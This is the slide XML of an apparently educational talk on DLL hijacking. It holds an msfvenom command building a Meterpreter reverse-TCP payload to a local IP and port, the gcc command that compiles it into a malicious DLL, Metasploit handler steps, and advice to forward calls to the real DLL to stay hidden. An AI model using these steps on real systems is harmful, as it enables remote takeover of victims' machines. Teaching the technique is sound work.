        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3735091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See Folder simple DLL for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a DLL which displays a message box and then opens a calculator instead of the application trying to be run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -o cryptbase.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>MsgAndCalc.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –shared to get the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Shared flag indicates we are compiling a shared library.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3664000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CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> LHOST=192.168.2.27 LPORT=9000 -f c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Flag p is to indicate we want a payload, -f c indicates we want the payload in c code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> -o compdll.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>template.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> –shared </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that is input to compile once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>template.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is given the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" u="sng" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="sng" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t> commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Show options allows you to see what fields can be input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Set LHOST, and LPORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Exploit –j to run exploit as a background job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295172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0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="68000">
                      <a:srgbClr val="F1F1F1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="11000"/>
                        <a:lumOff val="89000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="469900" dist="342900" dir="5400000" sy="-20000" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="66000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="r"/>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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"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stStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>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32000"/>
                        <a:lumOff val="68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1/13/2016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13000"/>
                  <a:lumOff val="87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34080" y="727064"/>
            <a:ext cx="5103962" cy="1641490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>DLL HIJACKING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1228624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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Complex DLL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="959187"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to write a more complex DLL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1420852"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to create a reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> shell payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="2805847"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- DLL will inject this payload into system memory when a process calls it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1882517"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>- https://github.com/rapid7/metasploit-framework/tree/master/data/templates/src/pe/dll</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="3267512"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- We’ll have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> session open in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to listen to when the system connects back to us</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="4514007"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323747818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7" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="6"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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Complex DLL Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="959187"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Demo allowed us to exploit the system, but the installer never ran</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1453209"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- We can debug a DLL to determine which system functions it call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="3239893"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Some tools, DLL Export Viewer, Dependency Walker </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1947231"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- These calls can be forwarded to a legitimate copy of the DLL, while the malicious DLL does what it has to do</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="2778228"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-  Involves DLL debugging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057178" y="4405588"/>
            <a:ext cx="2207623" cy="809897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx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Malicious DLL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6211388" y="4405049"/>
            <a:ext cx="2207623" cy="809897"/>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Copy of DLL being replaced</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3958045" y="4809998"/>
            <a:ext cx="18418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676281" y="4135087"/>
            <a:ext cx="2535107" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forward legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>unction calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23776849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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>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additive="base">
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="4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0" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>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342055"/>
            <a:ext cx="8352445" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Real Life </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Scenarios (Browser Vulnerabilities)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1632150"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Until recently chrome automatically downloaded files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988741" y="2160143"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
